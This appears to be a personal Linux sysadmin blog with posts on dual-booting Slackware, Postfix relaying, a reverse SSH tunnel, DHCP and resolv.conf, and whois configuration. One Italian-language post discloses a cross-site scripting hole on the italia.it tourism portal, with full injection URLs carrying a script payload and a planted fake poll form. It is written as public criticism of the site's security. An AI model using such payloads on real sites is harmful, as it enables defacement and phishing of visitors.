vacmf
there's more than one way to do it
there's more than one way to do it
Sep 12th
Important: the procedure can destroy all your system’s data if you don’t pay attention. First of all create a full backup. Time machine could be a good choice.
There are plenty of HOW-TOs to help in making a Macbook dual bootable with pictures and screenshot how to use disk utility and bootcamp so please refer to those documents, I’ll give a short overview and focus the attention on the installation process.
This covers the Slackware 13 but it’s applicable to any otherĀ distro I guess.
The first step is to create a bootcamp partition. The process is quite simple and straightforward with the above mentioned bootcamp.
It’s time to play. Insert the first Slack CD and boot the Mac holding the “Command” key (left Alt) to start from the CD and begin a normal installation.
Use fdisk or cfdisk to partition the disk (I’m an fdisk’s fan since old time)
# fdisk /dev/sda
The “b” type labeled W95 FAT32 partition should be shown. It’s bootcamp.
Delete it and create the “Swap partition” and the “Linux root” partition (simplest way), save, and start the normal setup.
Be careful with the disk partitioning tool to not delete OS X!
After the packages are installed, it’s time to set a minimum configuration.
Follow some settings that worked for me:
Console framebuffer: 1024×768 256 colors
Lilo installed in the MBR
Slackware logo: yes, of course!
After the reboot I was surprised by the impossibility to hold down “Command” and choose the OS I’d like to boot.
Now it’s time to install rEFIt
Reboot again and… surprise surprise, you don’t se rEFIt menu’. Shutdown the Mac and boot again.
Now rEFIt boot menu’ should show up, choose Linux and hopefully it boots. My way was a bit harder and got the message: “no bootable disk”.
After some additional shutdown and boot up, it started working.
Ethernet and WiFi cards seem to work perfectly just after the first boot.
The keyboard has few problem:
Other devices to be checked:
- graphic card
- cd/dvd
- iSight cam
- soundcard
- mouse pad
The rest works quite fine.
Jun 11th
I wrote a simple document to help in configuring Postfix mail server with a relay host that require SASL authentication.
It’s a common situation when you have an MTA at home or at your office with a dynamic IP adrress.
You can find it im my wiki with the Postfix with relayhost and SASL client
Feb 26th
Il nuovo portale italiano sul turismo italia.it fa un po’ acqua da tutte le parti inquanto a sicurezza.
Chi vuole un esempio, provi a sostituire il valore del parametro “scope” passato sulla URI del sito con:
"><script>alert('YaBaDaBaDoOoO');</script>
<"input type="hidden" value="
cosi facendo si inserisce lo script nella:
<input type=...
http://www.italia.it/it/scout/text/5,it,SCH1,2005/objectId,
RGN8it,modulId,scout,s,0,season,at1,selectedEntry,
home/result.html?rgnCMP=RGN8it&scope=">
<script>alert('YaBaDaBaDoOoO');<
/script><input type="hidden"
value="&Submit2.x=12&Submit2.y=10
Con piu’ fantasia, si puo’ aggiungere un sondaggio :)
http://www.italia.it/it/scout/text/5,it,SCH1,2005/objectId,
RGN8it,modulId,scout,s,0,season,at1,selectedEntry,
home/result.html?rgnCMP=RGN8it&scope=
"><script>alert('YaBaDaBaDoOoO');
</script><br><br>Come sono stati spesi i
soldi?<select><option>Male<option>
Malissimo</select><input type="submit"
value="Sei daccordo?" class="button">
<input type="hidden"
value="&Submit2.x=12&Submit2.y=10
o meglio: http://tinyurl.com/2h49x8
In parole povere, possiamo piu’ o meno ridefinire il sito abbastanza a piacere. E questo e’ un grave problema di sicurezza ponendo il sito al centro dell’attenzione di chi fa del phishing
la sua professione.
Dec 20th
Draft
What to do when you have a server behind a natted internet connection whitout public IP and you want to access it from your home or somewhere?
SSH is your best friend. So you can enable a reverse ssh tunnel that allow a connection from above the intranet.
server “S0″ in the intranet —-> Router (without access) —-> (OoOo Internet oOoO) <---- router (my CISCO 803) <---- "C1" remote computer (my.example.cxm)
In the server S0 I use ssh to create a tunnel that allow my C1 to connect it.
On S0
ssh -R 5000:localhost:22 my.example.cxm
On Router CISCO
ip nat inside source static tcp 10.1.1.1 5000 interface Dialer 1 5000
On C1
simply launch: ssh -p 5000 localhost
and you are connected to your server in the office intranet.
What appen if the connection goes down?
we can assure that the tunnel back up again. So we must consider the idea to insert a cron job which check periodically the tunnel status.
next: example shell script
Dec 20th
Draft
The “problem” is caused by dhcp server that overwrite our resolv.conf script and we lose this personalization during the IP release session. Not even is a good idea to replace the dns configuration proposed by the dhcp server, if it push that to you, probably there is a reason. But some time you want to use your own configuration such as when you use your broadband router and you want your /etc/resolv.conf has been preserved fron updates.
To prevent this nasty situation we can operate in two ways, determined by which dhcp client you are using: dhcpcd ord dhclient.
In the first case, dhcpcd (as in my Slackware laptop), prevent overriding can be obtained simply add the -R option to the dhcpcd command:
# dhcpcd -R eth0
In the second case, we must read the man page about dhclient-script which is invoked any time you use dhclient.
In:
man 8 dhclient-script
at the HOOKS section we can read:
HOOKS
When it starts, the client script first defines a shell function, make_resolv_conf , which is later used to create the /etc/resolv.conf file. To override the default behaviour, redefine this function in the enter hook script.
This means that we must to create /etc/dhclient-enter-hooks and redefine the make_resolv_conf function to satisfy our needs.
If we simply wants to prevent resolv.conf updates only, the fastest way is to redefine the function to do nothing:
# cat /etc/dhclient-enter-hooks
make_resolv_conf() {
exit 0
}
Then save the file and ensure it is executable:
# chmod a+x /etc/dhclient-enter-hooks
Note that, as explained in the man page, the dhclient-script is not standard so if this configuration doesn’t work, please read the man page.
Next: How to merge dns addresses pushed by the dhcp server and my own dns.
Jun 21st
If you launch the command
whois eurid.eu
I returned the following message:
No whois server is known for this kind of object.
So you can simply use:
whois -h whois.eu eurid
but from `man whois` I read:
If the /etc/whois.conf config file exists, it will be consulted to find
a server before applying the normal rules. Each line of the file should
contain a regular expression to be matched against the query text and
the whois server to use, separated by white space.
So I created the /etc/whois.conf file and filled it with:
.eu whois.eu
but it doesn’t work. From the output of:
strace /usb/bin/whois eurid.eu
we can see that the program doesn’t search /etc/whois.conf file so the “problem” is in the source.
To get whois read his config file you must download the program source from his developer web site
http://www.linux.it/~md/software/
then you need to extract the files from the archive and modify config.h simply to uncomment the line regarding /etc/whois.conf as reported:
#define CONFIG_FILE "/etc/whois.conf"
finally you have to recompile the program with make and install it.
Now that whois read his config files you can create it
# echo ".eu whois.eu" > /etc/whois.conf
and launch the program
whois eurid.eu
Now in the output you have the whois search result.